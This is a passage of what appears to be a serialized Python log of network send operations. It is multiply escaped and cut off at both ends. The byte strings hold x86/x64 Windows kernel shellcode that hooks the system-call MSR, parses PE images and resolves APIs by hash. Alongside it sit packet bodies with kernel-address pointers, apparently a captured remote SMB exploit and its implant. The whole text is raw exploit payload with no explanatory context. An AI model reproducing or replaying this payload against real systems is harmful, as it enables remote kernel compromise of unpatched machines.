H1\\\\xdb\\\\xff\\\\xcbH!\\\\xd8H1\\\\xc9\\\\xb9\\\\x82\\\\x00\\\\x00\\\\xc0\\\\x0f0\\\\xfb\\\\xe88\\\\x00\\\\x00\\\\x00\\\\xfaeH\\\\x8b$%\\\\xa8\\\\x01\\\\x00\\\\x00H\\\\x83\\\\xecxA_A^A]A\\\\\\\\A[AZAYAX]_^ZY[XeH\\\\x8b$%\\\\x10\\\\x00\\\\x00\\\\x00\\\\x0f\\\\x01\\\\xf8\\\\xff$%\\\\xf8\\\\x0f\\\\xd0\\\\xff1\\\\xc0@\\\\x90\\\\x0f\\\\x84\\\\xb5\\\\x05\\\\x00\\\\x00\\\\xe8\\\\x00\\\\x00\\\\x00\\\\x00X`\\\\x89\\\\xc3\\\\x89\\\\xe5\\\\x83\\\\xecHd\\\\x8b\\\\r8\\\\x00\\\\x00\\\\x00f\\\\x8bA\\\\x06\\\\xc1\\\\xe0\\\\x10f\\\\x8b\\\\x01f%\\\\x00\\\\xf0\\\\x8b\\\\x08f\\\\x81\\\\xf9MZt\\\\x07-\\\\x00\\\\x10\\\\x00\\\\x00\\\\xeb\\\\xf0\\\\x89E\\\\xfcS\\\\x89\\\\xc3\\\\xb9\\\\x94\\\\x01i\\\\xe3\\\\xe8>\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xf8\\\\xb9\\\\x85T\\\\x83\\\\xf0\\\\xe81\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xf4\\\\xb9.[Q\\\\xd2\\\\xe8$\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xec[\\\\x8dU\\\\xe81\\\\xc9\\\\x89\\\\nRj\\\\x00Rj\\\\x0b\\\\xff\\\\xd0\\\\x8bU\\\\xe8\\\\x85\\\\xd2\\\\x0f\\\\x84\\\\x02\\\\x01\\\\x00\\\\x00Rj\\\\x00\\\\xffU\\\\xf8\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xf4\\\\x00\\\\x00\\\\x00Pj\\\\x00\\\\xffu\\\\xe8Pj\\\\x0b\\\\xffU\\\\xec\\\\x85\\\\xc0\\\\x0f\\\\x85\\\\xe0\\\\x00\\\\x00\\\\x00XP-\\\\xfc\\\\x00\\\\x00\\\\x00\\\\x05\\\\x1c\\\\x01\\\\x00\\\\x00P\\\\xe8\\\\x80\\\\x01\\\\x00\\\\x00\\\\xb9\\\\xfa<\\\\xad\\\\xc29\\\\xc8t\\\\x1e\\\\xb9\\\\x1a\\\\xbdK+9\\\\xc8t\\\\x15X\\\\x8bU\\\\xe8\\\\x81\\\\xea\\\\x1c\\\\x01\\\\x00\\\\x00\\\\x0f\\\\x8c\\\\xac\\\\x00\\\\x00\\\\x00\\\\x89U\\\\xe8\\\\xeb\\\\xceX\\\\x8bp\\\\xec\\\\xffU\\\\xf4\\\\x89\\\\xf0PPh.datja\\\\xe8\\\\\\'\\\\x02\\\\x00\\\\x00\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\x88\\\\x00\\\\x00\\\\x00X\\\\x83\\\\xe9@\\\\xe8Z\\\\x02\\\\x00\\\\x00\\\\x85\\\\xc0t\\\\x15\\\\x8b\\\\x16\\\\xc1\\\\xea\\\\x18\\\\x89\\\\xf0\\\\xc1\\\\xe8\\\\x189\\\\xd0u\\\\x07\\\\x8bFH\\\\x85\\\\xc0t\\\\n\\\\x83\\\\xc6\\\\x04\\\\x83\\\\xe9\\\\x04\\\\xe3^\\\\xeb\\\\xd8\\\\x89u\\\\xf0Vh\\\\xf8\\\\x0f\\\\x00\\\\x00j\\\\x00\\\\xffU\\\\xf8\\\\x85\\\\xc0tJP\\\\x89\\\\xc71\\\\xc0\\\\x89\\\\xc1f\\\\x81\\\\xc1\\\\x00\\\\x04\\\\xf3\\\\xabX\\\\x89\\\\x00\\\\x8bU\\\\x04\\\\x89P\\\\x041\\\\xd7\\\\x8bU\\\\xf8\\\\x89P\\\\x081\\\\xd7\\\\x8bU\\\\xf4\\\\x89P\\\\x0c1\\\\xd7\\\\x8bU\\\\xf0\\\\x89P\\\\x101\\\\xd7\\\\x89x$\\\\x83\\\\xc0H\\\\x89\\\\xc7\\\\x8d\\\\xb3\\\\x96\\\\x03\\\\x00\\\\x00\\\\xb9\\\\x1a\\\\x02\\\\x00\\\\x00\\\\xf3\\\\xa4[\\\\x89C8\\\\x89\\\\xeca\\\\xc3SRQWU\\\\x89\\\\xe5\\\\x83\\\\xec\\\\x18\\\\x89\\\\xcf\\\\x89\\\\xd8\\\\x89E\\\\xfc\\\\xe8z\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0tm\\\\x89E\\\\xf8\\\\xe8\\\\xee\\\\x00\\\\x00\\\\x00\\\\x89E\\\\xf4\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\x0e\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0tS\\\\x89E\\\\xf0\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\x04\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0tA\\\\x89E\\\\xec\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\xfa\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t/\\\\x89E\\\\xe8\\\\x8bE\\\\xfc\\\\x89\\\\xf9\\\\x8bU\\\\xec\\\\x8b]\\\\xf4\\\\xe8\\\\xab\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t\\\\x18\\\\x89\\\\xc1\\\\x8bE\\\\xe8\\\\xe8\\\\xdd\\\\x00\\\\x00\\\\x00f\\\\x89\\\\xc2\\\\x8bE\\\\xfc\\\\x8bM\\\\xf0\\\\xe8\\\\xd7\\\\x00\\\\x00\\\\x00\\\\x83\\\\xc4\\\\x18]_YZ[\\\\xc3V\\\\x89\\\\xc6\\\\x83\\\\xc6<\\\\x8b6\\\\x01\\\\xc6f\\\\x81>PEu\\\\t\\\\x83\\\\xc6x\\\\x8b6\\\\x01\\\\xf0^\\\\xc31\\\\xc0\\\\xeb\\\\xfaVQW\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\x05\\\\x01\\\\xc8F\\\\xeb\\\\xe9_Y^\\\\xc3VWR\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xd2\\\\x8a\\\\x16\\\\x01\\\\xd0F\\\\xe2\\\\xeeZ_^\\\\xc3VQW\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\xc6\\\\x01\\\\xc8FF\\\\xeb\\\\xe8_Y^\\\\xc3\\\\x83\\\\xc0\\\\x18\\\\x8b\\\\x00\\\\xc3WVQ1\\\\xff\\\\x89\\\\xc69\\\\xdft\\\\x19\\\\x8b\\\\x04\\\\xba\\\\x01\\\\xf0\\\\xe8\\\\x83\\\\xff\\\\xff\\\\xff9\\\\xc8t\\\\x07G\\\\xeb\\\\xebY^_\\\\xc3\\\\x89\\\\xf8\\\\xeb\\\\xf81\\\\xc0\\\\xeb\\\\xf4\\\\x83\\\\xc1\\\\x1c\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\x83\\\\xc1 \\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\x83\\\\xc1$\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\xd1\\\\xe1\\\\x01\\\\xc8f\\\\x8b\\\\x00\\\\xc3\\\\x81\\\\xe2\\\\xff\\\\xff\\\\x00\\\\x00\\\\xc1\\\\xe2\\\\x02\\\\x01\\\\xd1\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3RV\\\\x8bt$\\\\x0c\\\\x8bL$\\\\x101\\\\xd2\\\\xd1\\\\xe9\\\\x85\\\\xc9t\\\\x0c\\\\xc1\\\\xc2\\\\x05\\\\xacF\\\\x0c 0\\\\xc2I\\\\xeb\\\\xf0\\\\x89\\\\xd0^Z\\\\xc2\\\\x08\\\\x00XZ_^PV\\\\x89\\\\xf0\\\\x83\\\\xc6<\\\\x8b6\\\\x01\\\\xc61\\\\xc0\\\\x89\\\\xc1f\\\\x8bN\\\\x06f\\\\x8bF\\\\x14\\\\x01\\\\xc6\\\\x83\\\\xc6\\\\x18\\\\x85\\\\xc9t\\\\x1d\\\\x8b\\\\x069\\\\xf8u\\\\x07\\\\x8bF\\\\x049\\\\xd0t\\\\x06\\\\x83\\\\xc6(I\\\\xeb\\\\xe9\\\\x8bF\\\\x0c\\\\x8bN\\\\x08^\\\\x01\\\\xc6\\\\xc31\\\\xf6\\\\xc3`1\\\\xc0\\\\x83\\\\xf8\\\\x0ft\\\\x1e1\\\\xc9\\\\x8b<\\\\x86\\\\x8b\\\\x14\\\\x8e9\\\\xd7t\\\\x03Au\\\\xf3\\\\x0f\\\\xb6\\\\x94\\\\x03\\\\x87\\\\x03\\\\x00\\\\x009\\\\xd1u\\\\r@\\\\xeb\\\\xddA9\\\\xc8u\\\\x05a1\\\\xc0@\\\\xc3a1\\\\xc0\\\\xc3\\\\x00\\\\x01\\\\x02\\\\x03\\\\x04\\\\x05\\\\x06\\\\x07\\\\x08\\\\t\\\\n\\\\t\\\\t\\\\r\\\\x0e\\\\x8bL$\\\\x08`\\\\xe8\\\\x00\\\\x00\\\\x00\\\\x00]f\\\\x81\\\\xe5\\\\x00\\\\xf0\\\\x89M4\\\\xe8\\\\xd9\\\\x01\\\\x00\\\\x00\\\\xe8C\\\\x01\\\\x00\\\\x00\\\\xe8\\\\x7f\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xe3\\\\x00\\\\x00\\\\x00\\\\x8b]<\\\\x8bK\\\\xd8\\\\xe8\\\\x17\\\\x01\\\\x00\\\\x00<#t\\\\r<wt\\\\x1c<\\\\xc8t\"\\\\xe9\\\\xb6\\\\x00\\\\x00\\\\x00\\\\x8bM8\\\\x8bE$\\\\x89A\\\\x0e1\\\\xc0\\\\x88A\\\\x12\\\\xe9\\\\x9f\\\\x00\\\\x00\\\\x00\\\\xe8\\\\x13\\\\x01\\\\x00\\\\x00\\\\xe9\\\\xb5\\\\x00\\\\x00\\\\x00\\\\x8b]<\\\\x8bC\\\\xe8\\\\x8b03u(\\\\x8bx\\\\x083}(\\\\x8b@\\\\x043E(;C\\\\x10\\\\x89\\\\xc3u{\\\\x8bM09\\\\xf1\\\\x8bE,t\\\\x18\\\\xe8\\\\xf2\\\\x00\\\\x00\\\\x00\\\\x8dF\\\\x04Pj\\\\x00\\\\xffU\\\\x08\\\\x85\\\\xc0tc\\\\x89E,\\\\x89u0\\\\x01\\\\xdf9\\\\xf7wS)\\\\xdf\\\\x01\\\\xc7W\\\\x89\\\\xf2\\\\x8bu<\\\\x8bv\\\\xf0\\\\x89\\\\xd9\\\\xf3\\\\xa4^\\\\x89\\\\xd9\\\\xc1\\\\xe9\\\\x02\\\\x8b](1\\\\x1e\\\\x83\\\\xc6\\\\x04\\\\xe2\\\\xf9\\\\x01\\\\xd09\\\\xc6|(\\\\x8bE,`\\\\x89\\\\xe6P\\\\xff\\\\xd0\\\\x89\\\\xf4a\\\\xe8\\\\xa1\\\\x00\\\\x00\\\\x00\\\\x8bE$\\\\xd1\\\\xe81\\\\xc9\\\\x88\\\\xc1\\\\x01\\\\xe9\\\\x8b\\\\t1\\\\xc8\\\\x89E$\\\\xe8h\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x10\\\\xeb\\\\x08\\\\xb0 \\\\xeb\\\\x04\\\\xb00\\\\xeb\\\\x00\\\\x8bM8\\\\xb4\\\\x00f\\\\x01A\\\\x1e\\\\x8bE\\\\x10\\\\x89D$\\\\x1ca\\\\xff`<\\\\x8dEH\\\\x8bM\\\\x0c\\\\x89\\\\x88G\\\\x01\\\\x00\\\\x00\\\\x89\\\\xa8>\\\\x01\\\\x00\\\\x00f\\\\xb8\\\\x10\\\\x00\\\\x8bM8f\\\\x01A\\\\x1e\\\\x8bE\\\\x10\\\\x89D$\\\\x1cah\\\\x00\\\\x00\\\\x00\\\\x00\\\\x8b@<Ph\\\\x00\\\\x00\\\\x00\\\\x00\\\\xc31\\\\xc0\\\\x88\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc3Q\\\\x8bE$\\\\x89\\\\xc1\\\\x0f\\\\xc9\\\\xd1\\\\xe01\\\\xc8\\\\x89E(Y\\\\xc3`\\\\xe8\\\\x0b\\\\x00\\\\x00\\\\x00\\\\x8bE\\\\x10\\\\x8bH<\\\\x89H8a\\\\xc3`\\\\x8b],\\\\x85\\\\xdbt\\\\r1\\\\xc0\\\\x89\\\\xdf\\\\x8bM0\\\\xf3\\\\xaaS\\\\xffU\\\\x0c1\\\\xc0\\\\x89E0\\\\x89E,a\\\\xc3WRV\\\\x89\\\\xcf\\\\x8bUD\\\\x8b\\\\n\\\\xe89\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0u\\\\x0e\\\\x83\\\\xc2\\\\x08\\\\x8b\\\\n\\\\xe8+\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t!\\\\x89MDj\\\\x0cX\\\\x8dqT;\\\\x06t\\\\x07\\\\x83\\\\xc6\\\\x04;\\\\x06u\\\\r;F\\\\x04u\\\\x08\\\\x89u<1\\\\xc0@\\\\xeb\\\\x021\\\\xc0^Z_\\\\xc31\\\\xc09\\\\xc1}\\\\x01@\\\\xc3RQ1\\\\xd2f\\\\x8bQ\\\\x02\\\\x01\\\\xca;\\\\x11t\\\\x05\\\\x83\\\\xc1\\\\x04\\\\xeb\\\\xf7Z\\\\x8dA\\\\x1c\\\\x83\\\\xc0\\\\x07$\\\\xf8\\\\x89ED\\\\x8bA\\\\xf8\\\\x89E8\\\\x89\\\\xd1Z\\\\xc3SUWVATAUAVAWH\\\\x89\\\\xe5H\\\\x81\\\\xec\\\\x80\\\\x00\\\\x00\\\\x00f\\\\x83\\\\xe4\\\\xf0\\\\xe8\\\\x83\\\\x03\\\\x00\\\\x00H\\\\x89E\\\\xf8H\\\\x89\\\\xc3\\\\xb9.[Q\\\\xd2\\\\xe8\\\\xee\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xd5\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xc6\\\\xb9\\\\x94\\\\x01i\\\\xe3\\\\xe8\\\\xd8\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xbf\\\\x01\\\\x00\\\\x00H\\\\x89E\\\\xf0H\\\\x89\\\\xc7\\\\xb9\\\\x85T\\\\x83\\\\xf0\\\\xe8\\\\xbe\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xa5\\\\x01\\\\x00\\\\x00H\\\\x89E\\\\xe8L\\\\x8dM\\\\xd0M1\\\\xc0L\\\\x89\\\\xc1D\\\\x89E\\\\xd0L\\\\x89\\\\xc2\\\\xb1\\\\x0b\\\\xff\\\\xd6D\\\\x8bE\\\\xd0E\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\x7f\\\\x01\\\\x00\\\\x00\\\\x8bU\\\\xd0H1\\\\xc9\\\\xff\\\\xd7H\\\\x85\\\\xc0\\\\x0f\\\\x84n\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xc3H1\\\\xc9I\\\\x89\\\\xc9D\\\\x8bE\\\\xd0H\\\\x89\\\\xc2\\\\xb1\\\\x0b\\\\xff\\\\xd6H\\\\x85\\\\xc0\\\\x0f\\\\x85Q\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xd8H-\\\\xf8\\\\x00\\\\x00\\\\x00H\\\\x05(\\\\x01\\\\x00\\\\x00\\\\x8bU\\\\xd0\\\\x81\\\\xea(\\\\x01\\\\x00\\\\x00\\\\x0f\\\\x8c3\\\\x01\\\\x00\\\\x00\\\\x89U\\\\xd0P\\\\xe8?\\\\x02\\\\x00\\\\x00H\\\\x89\\\\xc2X\\\\xb9\\\\xfa<\\\\xad\\\\xc2H9\\\\xcat\\\\n\\\\xb9\\\\x1a\\\\xbdK+H9\\\\xcau\\\\xcaH\\\\x8bp\\\\xe8H\\\\x89\\\\xd9\\\\xffU\\\\xe8H\\\\x89\\\\xf0H1\\\\xd2H\\\\x89\\\\xc3\\\\x8bP<H\\\\x01\\\\xd0H\\\\x89\\\\xc6H1\\\\xc9H\\\\x89\\\\xcaf\\\\x8bH\\\\x06f\\\\x8bP\\\\x14H\\\\x01\\\\xd6H\\\\x83\\\\xc6\\\\x18H\\\\xbf.data\\\\x00\\\\x00\\\\x00H\\\\x83\\\\xf9\\\\x00\\\\x0f\\\\x84\\\\xcd\\\\x00\\\\x00\\\\x00H\\\\x8b\\\\x06H9\\\\xf8t\\\\tH\\\\x83\\\\xc6(H\\\\xff\\\\xc9\\\\xeb\\\\xe5\\\\x8bF\\\\x0c\\\\x8bN\\\\x08H\\\\x01\\\\xc6H\\\\xbb\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfeH\\\\x83\\\\xe9\\\\x08H\\\\x83\\\\xf9\\\\x00\\\\x0f\\\\x8c\\\\x9b\\\\x00\\\\x00\\\\x00H\\\\x8b>H9\\\\xdfu\\\\x0cL\\\\x8b\\\\x86\\\\x98\\\\x00\\\\x00\\\\x00M\\\\x85\\\\xc0t\\\\x06H\\\\x83\\\\xc6\\\\x08\\\\xeb\\\\xd8H\\\\x83\\\\xc6\\\\x08H\\\\x89u\\\\xe0H1\\\\xc9\\\\xba\\\\xf0\\\\x0f\\\\x00\\\\x00\\\\xffU\\\\xf0H\\\\x85\\\\xc0tiI\\\\x89\\\\xc1H1\\\\xc0\\\\xb9\\\\x00\\\\x04\\\\x00\\\\x00L\\\\x89\\\\xcf\\\\xf3\\\\xabL\\\\x89\\\\xcfH\\\\x83\\\\xc7`H\\\\x8d5\\\\x91\\\\x02\\\\x00\\\\x00H1\\\\xc9f\\\\xb96\\\\x02\\\\xf3\\\\xa4M\\\\x89\\\\tH\\\\x8b]\\\\xf8I\\\\x89Y\\\\x08H1\\\\xdfH\\\\x8b]\\\\xf0I\\\\x89Y\\\\x10H1\\\\xdfH\\\\x8b]\\\\xe8I\\\\x89Y\\\\x18H1\\\\xdfH\\\\x8b]\\\\xe0I\\\\x89Y H1\\\\xdfA\\\\x89yDH\\\\x8bE\\\\xe0H\\\\x83\\\\xc0pI\\\\x83\\\\xc1`L\\\\x89\\\\x08H\\', 0.0)', '(\\'send\\', 6, b\\'\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x03\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x03\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x00\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\xb0\\\\x00\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xc0\\\\xf0\\\\xdf\\\\xff\\\\xc0\\\\xf0\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x90\\\\xf1\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\xf0\\\\xf1\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xf0\\\\x01\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x02\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x001\\\\xc0@\\\\x90t\\\\x08\\\\xe8\\\\t\\\\x00\\\\x00\\\\x00\\\\xc2$\\\\x00\\\\xe8\\\\xa7\\\\x00\\\\x00\\\\x00\\\\xc3\\\\xe8\\\\x01\\\\x00\\\\x00\\\\x00\\\\xeb\\\\x90[\\\\xb9v\\\\x01\\\\x00\\\\x00\\\\x0f2\\\\xa3\\\\xfc\\\\xff\\\\xdf\\\\xff\\\\x8dC\\\\x171\\\\xd2\\\\x0f0\\\\xc3\\\\xb9#\\\\x00\\\\x00\\\\x00j0\\\\x0f\\\\xa1\\\\x8e\\\\xd9\\\\x8e\\\\xc1d\\\\x8b\\\\r@\\\\x00\\\\x00\\\\x00\\\\x8ba\\\\x04\\\\xff5\\\\xfc\\\\xff\\\\xdf\\\\xff`\\\\x9cj#R\\\\x9cj\\\\x02\\\\x83\\\\xc2\\\\x08\\\\x9d\\\\x80L$\\\\x01\\\\x02j\\\\x1b\\\\xff5\\\\x04\\\\x03\\\\xdf\\\\xffj\\\\x00USVWd\\\\x8b\\\\x1d\\\\x1c\\\\x00\\\\x00\\\\x00j;\\\\x8b\\\\xb3$\\\\x01\\\\x00\\\\x00\\\\xff31\\\\xc0H\\\\x89\\\\x03\\\\x8bn(j\\\\x01\\\\x83\\\\xecH\\\\x81\\\\xed\\\\x9c\\\\x02\\\\x00\\\\x00\\\\xa1\\\\xfc\\\\xff\\\\xdf\\\\xff\\\\xb9v\\\\x01\\\\x00\\\\x001\\\\xd2\\\\x0f0\\\\xfb\\\\xe8\\\\x11\\\\x00\\\\x00\\\\x00\\\\xfad\\\\x8b\\\\r@\\\\x00\\\\x00\\\\x00\\\\x8ba\\\\x04\\\\x83\\\\xec(\\\\x9da\\\\xc3\\\\xe9\\\\xef\\\\x00\\\\x00\\\\x00\\\\xb9\\\\x82\\\\x00\\\\x00\\\\xc0\\\\x0f2H\\\\xbb\\\\xf8\\\\x0f\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x89S\\\\x04\\\\x89\\\\x03H\\\\x8d\\\\x05\\\\n\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xc2H\\\\xc1\\\\xea \\\\x0f0\\\\xc3\\\\x0f\\\\x01\\\\xf8eH\\\\x89$%\\\\x10\\\\x00\\\\x00\\\\x00eH\\\\x8b$%\\\\xa8\\\\x01\\\\x00\\\\x00PSQRVWUAPAQARASATAUAVAWj+e\\\\xff4%\\\\x10\\\\x00\\\\x00\\\\x00ASj3QL\\\\x89\\\\xd1H\\\\x83\\\\xec\\\\x08UH\\\\x81\\\\xecX\\\\x01\\\\x00\\\\x00H\\\\x8d\\\\xac$\\\\x80\\\\x00\\\\x00\\\\x00H\\\\x89\\\\x9d\\\\xc0\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xbd\\\\xc8\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xb5\\\\xd0\\\\x00\\\\x00\\\\x00H\\\\xa1\\\\xf8\\\\x0f\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xffH\\\\x89\\\\xc2H\\\\xc1\\\\xea H1\\\\xdb\\\\xff\\\\xcbH!\\\\xd8H1\\\\xc9\\\\xb9\\\\x82\\\\x00\\\\x00\\\\xc0\\\\x0f0\\\\xfb\\\\xe88\\\\x00\\\\x00\\\\x00\\\\xfaeH\\\\x8b$%\\\\xa8\\\\x01\\\\x00\\\\x00H\\\\x83\\\\xecxA_A^A]A\\\\\\\\A[AZAYAX]_^ZY[XeH\\\\x8b$%\\\\x10\\\\x00\\\\x00\\\\x00\\\\x0f\\\\x01\\\\xf8\\\\xff$%\\\\xf8\\\\x0f\\\\xd0\\\\xff1\\\\xc0@\\\\x90\\\\x0f\\\\x84\\\\xb5\\\\x05\\\\x00\\\\x00\\\\xe8\\\\x00\\\\x00\\\\x00\\\\x00X`\\\\x89\\\\xc3\\\\x89\\\\xe5\\\\x83\\\\xecHd\\\\x8b\\\\r8\\\\x00\\\\x00\\\\x00f\\\\x8bA\\\\x06\\\\xc1\\\\xe0\\\\x10f\\\\x8b\\\\x01f%\\\\x00\\\\xf0\\\\x8b\\\\x08f\\\\x81\\\\xf9MZt\\\\x07-\\\\x00\\\\x10\\\\x00\\\\x00\\\\xeb\\\\xf0\\\\x89E\\\\xfcS\\\\x89\\\\xc3\\\\xb9\\\\x94\\\\x01i\\\\xe3\\\\xe8>\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xf8\\\\xb9\\\\x85T\\\\x83\\\\xf0\\\\xe81\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xf4\\\\xb9.[Q\\\\xd2\\\\xe8$\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xe